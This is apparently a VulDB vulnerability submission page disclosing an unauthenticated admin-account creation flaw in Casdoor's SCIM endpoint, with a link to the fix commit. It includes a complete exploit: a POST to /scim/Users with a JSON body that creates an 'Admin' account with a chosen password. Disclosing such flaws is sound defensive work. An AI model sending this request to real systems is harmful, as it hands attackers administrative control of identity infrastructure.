| 제목 | Casbin Casdoor v1.430.0-v1.812.0 Authorization Bypass |
|---|
| 설명 | All versions of this IAM product released between Oct 2023 and Jan 2025 are vulnerable to a remote attacker creating an admin account without authenticating.
The endpoint to create SCIM users is simply lacking authentication middleware, creating a SCIM user will associate a corresponding local user.
To use the exploit, issue a POST request to `/scim/Users`:
```
{"active":true,"displayName":"Admin","emails":[{"value":"[email protected]"}],"password":"cool-password"}
```
The developers silently issued a fix: https://github.com/casdoor/casdoor/commit/3d12ac8dc2282369296c3386815c00a06c6a92fe
Developers have not responded to email, on Discord they responded by kicking me.
This is being actively exploited in the wild. |
|---|
| 사용자 | krav (UID 84007) |
|---|
| 제출 | 2025. 04. 11. AM 12:13 (1 년도 ago) |
|---|
| 모더레이션 | 2025. 05. 02. PM 12:45 (22 days later) |
|---|
| 상태 | 수락 |
|---|
| VulDB 항목 | 307180 [Casdoor 까지 1.811.0 SCIM User Creation Endpoint controllers/scim.go HandleScim 권한 상승] |
|---|
| 포인트들 | 17 |
|---|